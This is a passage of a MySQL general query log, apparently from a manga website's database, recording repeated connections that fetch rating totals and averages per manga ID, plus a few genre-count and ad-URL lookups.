= '118' order by created desc 330653624 Quit 330653625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330653625 Quit 330653626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330653626 Quit 330653627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330653627 Quit 330653628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330653628 Quit 330653629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330653629 Quit 330653630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330653630 Quit 330653631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330653631 Quit 330653632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330653632 Quit 330653633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330653633 Quit 330653634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330653634 Quit 330653635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330653635 Quit 330653636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330653636 Quit 330653637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330653637 Quit 330653638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330653638 Quit 330653639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330653639 Quit 330653640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330653640 Quit 330653641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330653641 Quit 330653642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330653642 Quit 330653643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330653643 Quit 330653644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330653644 Quit 330653645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330653645 Quit 330653646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330653646 Quit 330653647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330653647 Quit 330653648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330653648 Quit 330653649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330653649 Quit 330653650 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330653650 Quit 330653651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330653651 Quit 330653652 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330653652 Quit 330653653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330653653 Quit 330653654 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330653654 Quit 330653655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330653655 Quit 330653656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330653656 Quit 330653657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330653657 Quit 330653658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330653658 Quit 330653659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330653659 Quit 330653660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330653660 Quit 330653661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330653661 Quit 330653662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330653662 Quit 330653663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330653663 Quit 330653664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330653664 Quit 330653665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330653665 Quit 330653666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330653666 Quit 330653667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330653667 Quit 330653668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330653668 Quit 330653669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330653669 Quit 330653670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330653670 Quit 330653671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330653671 Quit 330653672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330653672 Quit 330653673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330653673 Quit 330653674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330653674 Quit 330653675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330653675 Quit 330653676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330653676 Quit 330653677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330653677 Quit 330653678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330653678 Quit 330653679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330653679 Quit 330653680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330653680 Quit 330653681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330653681 Quit 330653682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330653682 Quit 330653683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330653683 Quit 330653684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330653684 Quit 330653685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330653685 Quit 330653686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330653686 Quit 330653687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653687 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330653687 Quit 330653688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330653688 Quit 330653689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330653689 Quit 330653690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330653690 Quit 330653691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330653691 Quit 330653692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330653692 Quit 330653693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330653693 Quit 330653694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330653694 Quit 330653695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330653695 Quit 330653696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330653696 Quit 330653697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330653697 Quit 330653698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330653698 Quit 330653699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330653699 Quit 330653700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330653700 Quit 330653701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330653701 Quit 330653702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330653702 Quit 330653287 Quit 330653703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330653703 Quit 330653704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653704 Quit 330653706 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330653705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330653705 Quit 330653706 Quit 330653707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330653707 Quit 330653708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330653708 Quit 330653709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330653709 Quit 330653710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330653710 Quit 330653711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653711 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330653711 Quit 330653712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330653712 Quit 330653713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653713 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330653713 Quit 330653714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330653714 Quit 330653715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653715 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330653715 Quit 330653716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330653718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653717 Quit 330653716 Quit 330653718 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330653719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653718 Quit 330653719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330653720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653719 Quit 330653721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330653721 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330653720 Quit 330653722 Quit 330653721 Quit 330653723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330653723 Quit 330653725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653724 Quit 330653725 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330653726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653725 Quit 330653726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330653726 Quit 330653727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330653727 Quit 330653728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330653728 Quit 330653729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330653729 Quit 330653730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330653730 Quit 330653731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330653731 Quit 330653732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330653732 Quit 330653733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330653733 Quit 330653734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330653734 Quit 330653735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330653735 Quit 330653736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330653736 Quit 330653737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330653737 Quit 330653738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330653738 Quit 330653739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330653739 Quit 330653740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330653740 Quit 330653741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330653741 Quit 330653742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330653742 Quit 330653743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330653743 Quit 330653744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330653744 Quit 330653745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330653745 Quit 330653746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330653746 Quit 330653747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330653747 Quit 330653748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330653748 Quit 330653749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330653749 Quit 330653750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330653750 Quit 330653751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330653751 Quit 330653752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330653752 Quit 330653753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330653753 Quit 330653754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330653754 Quit 330653755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330653755 Quit 330653756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330653756 Quit 330653757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330653757 Quit 330653758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330653758 Quit 330653759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330653759 Quit 330653760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330653760 Quit 330653761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330653761 Quit 330653762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330653762 Quit 330653763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330653763 Quit 330653764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330653764 Quit 330653765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330653765 Quit 330653766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330653766 Quit 330653767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330653767 Quit 330653768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330653768 Quit 330653769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330653769 Quit 330653770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330653770 Quit 330653771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330653771 Quit 330653772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330653772 Quit 330653773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330653773 Quit 330653774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330653774 Quit 330653775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330653775 Quit 330653776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330653776 Quit 330653777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330653777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330653777 Quit 330653778 